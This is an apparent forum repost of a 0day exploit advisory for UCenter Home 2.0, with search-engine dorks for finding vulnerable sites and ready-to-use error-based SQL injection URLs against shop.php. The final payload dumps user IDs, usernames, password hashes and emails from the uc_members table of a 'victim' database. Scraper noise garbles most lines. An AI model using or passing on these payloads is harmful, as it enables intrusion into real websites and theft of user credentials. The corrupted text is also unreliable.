`& X! i6 g) s0 c, S__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__
2 n& Y1 ?4 t- C' R6 x: t, a4 {1 O1 K3 J1 H E2 `% Z! Z+ c, G
+ U7 C- F- W8 Y, p
+ s0 n- L$ o5 } i# I*/ Author : KnocKout
* k4 F: ?& J! q' A% @
5 P6 p% x7 i% k" D1 o) X*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers 7 v* h4 v `5 s
3 V K7 i6 y! g2 F) ?- s& v
*/ Contact: knockoutr@msn.com
: X+ A% H9 d% b1 W: z: K3 s t1 w$ g1 ?) o% n3 x
*/ Cyber-Warrior.org/CWKnocKout 0 J! F1 w9 P7 e7 j; r
6 t8 Q; ~8 v+ K
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
# d+ L& j* G7 I9 w1 @1 X. \5 T J
Script : UCenter Home
/ x: r+ I: K" F" M$ n8 v" L6 g
" t6 R1 ?5 g. f( U' {6 LVersion : 2.0
8 Z* Q( h: c$ L( R) W$ a$ w5 X
: H( {; _" e+ m2 _Script HomePage : http://u.discuz.net/
. {2 i/ s: ~' A3 M+ E) e+ G3 l1 G8 i) ~* R1 e; o% k/ E/ f
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
0 w" p$ R- J" Z
' \% B6 M% F0 pDork : Powered by UCenter inurl:shop.php?ac=view
4 S0 k; i/ M" k5 @$ o% n0 ^. {% h3 G* N; D$ J
Dork 2 : inurl:shop.php?ac=view&shopid= 8 s3 @' g, J! j' m# a# n! O% a
% @* _! O7 G# J# i+ f! ?__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
% V) {7 O" ]$ q" i) e' M) T7 X! D4 m" h7 g( ]$ u, d
Vuln file : Shop.php
& E; R, H' c! \& i
' _) u5 B0 R# O7 U! {6 lvalue's : (?)ac=view&shopid=
! ~) Y( l; Z# B+ U4 a: e
+ t6 t S, i4 S5 r" p: Z. aVulnerable Style : SQL Injection (MySQL Error Based) 4 ?2 f' ~6 s! N2 j# u
! [1 v5 _: E$ LNeed Metarials : Hex Conversion ' E2 K( E5 X- b7 D0 N
0 K0 B* E W. F% z& f8 b__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== / T9 ~4 g V$ J# z! \
, m2 a9 J: e$ B4 }Your Need victim Database name.
5 R! Z% n& _5 D k. m8 r6 z
. H+ N" h, a! n6 D( l- Wfor Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
r# M( n4 n% U" U! j" g( q; ^1 p/ o
.. / {, a2 t& K2 K$ q
* B2 U8 G9 C1 {3 e2 r0 r
DB : Okey. & t' I$ B% Y8 O5 h! V$ \5 z9 E
% d' b: @# m0 I& |' L: byour edit DB `[TARGET DB NAME]`
$ h, `% E: B+ D! M7 G
8 f! q$ k- X+ B. T) z, i5 GExample : 'hiwir1_ucenter'
9 E1 H* o8 i- |( @" r- g. t z6 X* M& [* q9 I
Edit : Okey.
' r: E* p N7 C
& d4 z$ u0 y4 Q* GYour use Hex conversion. And edit Your SQL Injection Exploit..
7 k2 s2 b3 q9 ^$ j! O3 N
# d) I |3 H% f q4 ~7 c
" l x, ^# [0 z5 X
: d! ~# f$ L; W YExploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 L1 U- W6 S5 }8 W+ _/ @! Q$ `/ k
|
发表于 2013-2-27 21:31:31
收藏
支持
反对